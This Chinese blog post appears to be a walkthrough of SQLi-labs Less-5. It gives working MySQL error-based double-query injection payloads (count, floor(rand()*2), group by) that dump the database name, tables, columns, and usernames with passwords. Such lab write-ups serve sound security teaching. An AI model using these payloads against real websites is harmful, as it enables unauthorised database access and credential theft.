SQLI DUMB SERIES-5
less5
(1)输入单引号,回显错误,说明存在注入点。输入的Id被一对单引号所包围,可以闭合单引号
(2)输入正常时:?id=1
说明没有显示位,因此不能使用联合查询了;可以使用报错注入,有两种方式
(3)双注入查询
参考资料:http://www.2cto.com/article/201303/192718.html
简单的说,使用聚合函数进行双注入查询时,会在错误信息中显示一部分错误信息,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。
1)爆数据库名
1 | ?id=-1' union select count (*), count (*),concat(( select database ()),floor(rand()*2)) as a from information_schema.tables group by a --+ |
可知表明数据库名为"security"
2)将上述中的database(),改为version(),可得PHP版本
3)同样的方法可以爆用户名
4)爆表名
1 | ?id=-1' union select count (*), count (*),concat((select concat(table_name) from information_schema.tables where table_schema=database()limit 2,1), floor (rand()*2)) as a from information_schema.tables group by a--+ |
改变Limit后面的数字可以爆出所有表名,例如
5)爆列名(以user表为例)
1 | ?id=-1 ' union select count(*),count(*),concat((select column_name from information_schema.columns where table_name=' users' limit 0,1), floor (rand()*2)) as a from information_schema.tables group by a--+ |
改变Limit后面的数字可以爆出所有列名,例如
6)爆字段
1 | ?id=-1 ' union select count(*),count(*),concat((select concat_ws(' [',password,username) from users limit 0,1), floor (rand()*2)) as a from information_schema.tables group by a--+ |
Password与username之间用'['隔开,同样改变Limit后面的数字可以爆出user表的所有字段。
由于无法解释的神圣旨意,我们徒然地到处找你;你就是孤独,你就是神秘,比恒河或者日落还要遥远。。。。。。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 智能桌面机器人:用.NET IoT库控制舵机并多方法播放表情
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
· 手把手教你在本地部署DeepSeek R1,搭建web-ui ,建议收藏!
· 新年开篇:在本地部署DeepSeek大模型实现联网增强的AI应用
· Janus Pro:DeepSeek 开源革新,多模态 AI 的未来
· 互联网不景气了那就玩玩嵌入式吧,用纯.NET开发并制作一个智能桌面机器人(三):用.NET IoT库
· 【非技术】说说2024年我都干了些啥